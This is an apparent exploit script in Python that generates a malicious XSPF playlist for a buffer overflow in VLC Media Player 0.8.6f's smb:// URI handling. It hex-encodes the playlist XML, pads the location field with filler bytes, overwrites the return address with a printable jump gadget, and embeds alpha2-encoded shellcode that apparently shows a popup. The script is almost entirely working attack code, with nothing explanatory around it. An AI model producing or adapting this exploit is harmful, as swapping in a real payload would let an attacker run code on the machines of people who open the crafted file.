#!/usr/bin/python #[*] Exploit : VLC Media Player 0.8.6f smb:// URI Handling Remote BOF Exploit (univ) #[*] Credits : Pankaj Kohli #[*] Exploit : His0k4 header1=( "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31" "\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54" "\x46\x2d\x38\x22\x3f\x3e\x0a\x3c\x70\x6c\x61\x79\x6c\x69\x73\x74" "\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x22\x20\x78\x6d\x6c" "\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x78\x73\x70\x66\x2e" "\x6f\x72\x67\x2f\x6e\x73\x2f\x30\x2f\x22\x20\x78\x6d\x6c\x6e\x73" "\x3a\x76\x6c\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77" "\x2e\x76\x69\x64\x65\x6f\x6c\x61\x6e\x2e\x6f\x72\x67\x2f\x76\x6c" "\x63\x2f\x70\x6c\x61\x79\x6c\x69\x73\x74\x2f\x6e\x73\x2f\x30\x2f" "\x22\x3e\x0a\x09\x3c\x74\x69\x74\x6c\x65\x3e\x50\x6c\x61\x79\x6c" "\x69\x73\x74\x3c\x2f\x74\x69\x74\x6c\x65\x3e\x0a\x09\x3c\x74\x72" "\x61\x63\x6b\x4c\x69\x73\x74\x3e\x0a\x09\x09\x3c\x74\x72\x61\x63" "\x6b\x3e\x0a\x09\x09\x09\x3c\x6c\x6f\x63\x61\x74\x69\x6f\x6e\x3e" "\x73\x6d\x62\x3a\x2f\x2f\x65\x78\x61\x6d\x70\x6c\x65\x2e\x63\x6f" "\x6d\x40\x77\x77\x77\x2e\x65\x78\x61\x6d\x70\x6c\x65\x2e\x63\x6f" "\x6d\x2f\x66\x6f\x6f\x2f\x23\x7b") header2=( "\x7d\x3c\x2f\x6c\x6f\x63\x61\x74\x69\x6f\x6e\x3e\x0a\x09\x09\x09" "\x3c\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x20\x61\x70\x70\x6c\x69" "\x63\x61\x74\x69\x6f\x6e\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77" "\x77\x77\x2e\x76\x69\x64\x65\x6f\x6c\x61\x6e\x2e\x6f\x72\x67\x2f" "\x76\x6c\x63\x2f\x70\x6c\x61\x79\x6c\x69\x73\x74\x2f\x30\x22\x3e" "\x0a\x09\x09\x09\x09\x3c\x76\x6c\x63\x3a\x69\x64\x3e\x30\x3c\x2f" "\x76\x6c\x63\x3a\x69\x64\x3e\x0a\x09\x09\x09\x3c\x2f\x65\x78\x74" "\x65\x6e\x73\x69\x6f\x6e\x3e\x0a\x09\x09\x3c\x2f\x74\x72\x61\x63" "\x6b\x3e\x0a\x09\x3c\x2f\x74\x72\x61\x63\x6b\x4c\x69\x73\x74\x3e" "\x0a\x3c\x2f\x70\x6c\x61\x79\x6c\x69\x73\x74\x3e\x0a\x0a") #alpha2 encoded popup_msg=( "TY777777777777777777777777777777777QZjAXP0A0AkAAQ2AB2BB0" "BBABXP8ABuJIXkweaHrJwpf02pQzePMhyzWwSuQnioXPOHuBxKnaQlkO" "jpJHIvKOYokObPPwRN1uqt5PA") payload = header1 payload += "\x41"*96 payload += "\x4A\x21\x51\x68" # push esp;retn printable payload += popup_msg payload += "\x41"*43 payload += header2 try: out_file = open("exploit.xspf","w") out_file.write(payload) out_file.close() print("\nExploit file created!\n") except: print "Error"